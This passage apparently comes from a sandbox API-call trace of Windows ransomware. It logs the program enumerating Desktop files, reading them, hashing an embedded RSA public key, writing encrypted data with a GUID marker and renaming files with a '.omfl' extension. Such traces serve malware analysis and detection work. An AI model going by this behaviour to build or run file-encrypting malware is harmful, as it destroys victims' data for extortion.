lpOverlapped=0x0 | out: lpBuffer=0xdd2c688*, lpNumberOfBytesWritten=0xe00fb14*=0x1875d, lpOverlapped=0x0) returned 1 [0130.652] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0130.652] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x18762, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.652] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.652] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.652] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.652] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0130.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0130.652] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0130.652] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0130.652] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0130.652] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0130.653] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0130.653] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.653] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.653] CloseHandle (hObject=0x5c8) returned 1 [0130.655] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.655] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0xdd29950 [0130.655] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3198 | out: hHeap=0x4970000) returned 1 [0130.656] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oG7EuoqS8e9-7CYd0e.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\og7euoqs8e9-7cyd0e.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oG7EuoqS8e9-7CYd0e.mkv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\og7euoqs8e9-7cyd0e.mkv.omfl")) returned 1 [0130.656] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.656] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.657] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.658] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.658] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadace280, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xadace280, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xdda7b600, ftLastWriteTime.dwHighDateTime=0x1d6d589, nFileSizeHigh=0x0, nFileSizeLow=0xd1800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OqRoSnESYXcDITEx.exe", cAlternateFileName="OQROSN~1.EXE")) returned 1 [0130.658] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.658] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.658] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.658] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe") returned=".exe" [0130.658] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oqrosnesyxcditex.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.658] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.659] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a524d50, ftCreationTime.dwHighDateTime=0x1d5df8d, ftLastAccessTime.dwLowDateTime=0x592e900, ftLastAccessTime.dwHighDateTime=0x1d5e251, ftLastWriteTime.dwLowDateTime=0x592e900, ftLastWriteTime.dwHighDateTime=0x1d5e251, nFileSizeHigh=0x0, nFileSizeLow=0x9e1d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qqfeLsT-FLcq.mp3", cAlternateFileName="QQFELS~1.MP3")) returned 1 [0130.659] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.659] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0130.659] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.659] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qqfeLsT-FLcq.mp3") returned=".mp3" [0130.659] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qqfeLsT-FLcq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qqfelst-flcq.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.659] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=40477) returned 1 [0130.659] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.662] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x9df7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.662] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.663] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.663] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.663] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.663] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x9e1d, lpOverlapped=0x0) returned 1 [0130.663] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.663] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.663] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.664] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.664] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.665] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.665] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.665] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.665] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.665] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.665] GetLastError () returned 0x0 [0130.665] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.665] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.665] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.665] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.665] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.665] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.665] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.665] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.665] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.665] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9e20) returned 0xdd2c688 [0130.666] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.666] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.666] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.666] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.666] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.666] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.666] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf31f0 [0130.666] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c80 [0130.666] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf3238 [0130.666] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c98 [0130.666] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16cc8 [0130.666] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.666] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16ce0 [0130.666] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.666] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0130.666] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.666] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.666] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16cc8 | out: hHeap=0x4970000) returned 1 [0130.666] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ce0 | out: hHeap=0x4970000) returned 1 [0130.666] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.666] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.666] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.666] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.666] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0130.666] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16ce0 [0130.666] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0130.667] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16cc8 [0130.667] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.667] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.667] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.667] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0130.667] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.667] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.667] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf068 [0130.667] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.667] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.667] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ce0 | out: hHeap=0x4970000) returned 1 [0130.667] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.667] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16cc8 | out: hHeap=0x4970000) returned 1 [0130.667] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.667] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.667] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.667] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.667] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0130.667] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.667] GetCurrentThreadId () returned 0x618 [0130.667] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.667] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d60d0 [0130.667] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.667] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.667] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0130.667] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.667] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.667] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.668] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.668] GetCurrentThreadId () returned 0x618 [0130.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.668] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.668] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.668] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.668] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0130.668] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0130.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.668] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16cc8 [0130.668] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.668] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8b0 [0130.669] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.669] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.669] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.669] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.669] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.669] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16ce0 [0130.669] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0130.669] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0130.669] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0130.669] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16cb0 [0130.669] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0130.669] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0130.669] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.669] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0130.669] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.669] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.669] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.669] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0130.669] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.669] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16cf8 [0130.669] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.669] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16968 [0130.669] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0130.669] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8a0 [0130.669] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.669] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0130.669] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.669] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.669] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16cc8 | out: hHeap=0x4970000) returned 1 [0130.669] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16cc8 [0130.669] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.670] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0130.670] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.670] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0130.670] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.670] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0130.670] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.670] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0130.670] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0130.670] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0130.670] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16cc8 | out: hHeap=0x4970000) returned 1 [0130.670] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0130.670] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0130.670] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.670] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.670] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.670] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0130.670] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, 